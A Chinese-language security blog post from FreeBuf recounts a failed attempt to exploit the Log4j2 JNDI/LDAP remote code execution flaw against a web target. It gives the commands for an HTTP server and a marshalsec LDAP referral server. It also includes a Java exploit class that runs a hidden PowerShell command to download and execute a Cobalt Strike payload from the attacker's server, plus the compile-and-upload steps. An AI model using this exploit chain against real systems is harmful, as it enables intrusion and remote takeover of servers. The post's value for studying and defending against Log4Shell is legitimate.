freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一次失败的log4j2远程命令代码执行复现!
2023-12-11 19:05:34

发现漏洞

查看网页后台,发现该网页允许ldap。

1702291520_6576e840c06eaaf179248.png!small?1702291522998

且使用了 log4j2 来记录日志  , 那么就可能存在log4j2的远程命令执行漏洞。1702291570_6576e872bbbe98815b594.png!small?1702291573314


验证漏洞

dnslog 生成一个域名。

jndi+ldap注入。

1702291679_6576e8df56b89f79cc08b.png!small?1702291682003

域名成功解析了一次说明存在漏洞。

1702291333_6576e78541f30dfd39096.png!small?1702291335488


漏洞利用

  1. 在vps上随便找一个目录开启开一个http服务和一个ldap服务。1702292642_6576eca2c13228a6b2af4.png!small?1702292645089

    开启http服务:

    python -m http.server 5555

    开启ldap服务:

    marshalsec-master 工具开启ldap服务 (也可以用这个开rmi服务) (下载后需要用maven打包)

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://xxx.xxx.xxx:5555/#Log4jExp" 1389

    xxx.xxx.xxx:5555 为http服务ip和端口  , Log4jExp为接下来需要生成payload。


  2. 现在有了http服务(5555端口) 和 ldap服务(1389端口)。

    ldap服务会指向http中的Log4jExp.class ,该文件即我们需要目标系统执行的class文件。

    这里的思路是用cs 生成webdelivery 链接,让目标系统执行并上线。

    cs生成的webdelivery链接:

    (最好使用https://ares-x.com/tools/runtime-exec这个网站编码成base64)

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:80/a

    Log4jExp.java :

    package com.example.exp;

    import java.lang.Runtime;

    public class Log4jExp {
    public Log4jExp() {
    try {
    Runtime.getRuntime().exec("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:80/a'))"");
    } catch (Exception e) {
    e.printStackTrace();
    }
    }

    public static void main(String[] argv) {
    Log4jExp e = new Log4jExp();
    }
    }

    编译exp:

    javac Log4jExp.java

    1702292226_6576eb02e32fcceede741.png!small?1702292229184

    (这里编译好会立马被windows defender 删掉)

    想办法上传到公网服务器的http目录下。

  3. 启动cs!!!

  4. jndi+ldap注入!

    1702292318_6576eb5e7ed2f626280ac.png!small?1702292320925

    如果一切顺利 ,目标服务器将会上线cs。

    结果失败了! 目标迟迟不上线 , 查看ldap服务的日志发现确实被访问了 , 说明我们部署的ldap服务和http服务没问题。
  5. 失败的可能原因:

目标服务器的java版本过高

(这里直接借用其他大佬的总结)

1702638766_657c34ae68b4163bca737.png!small?1702638768004

# 渗透测试 # web安全 # 漏洞分析 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录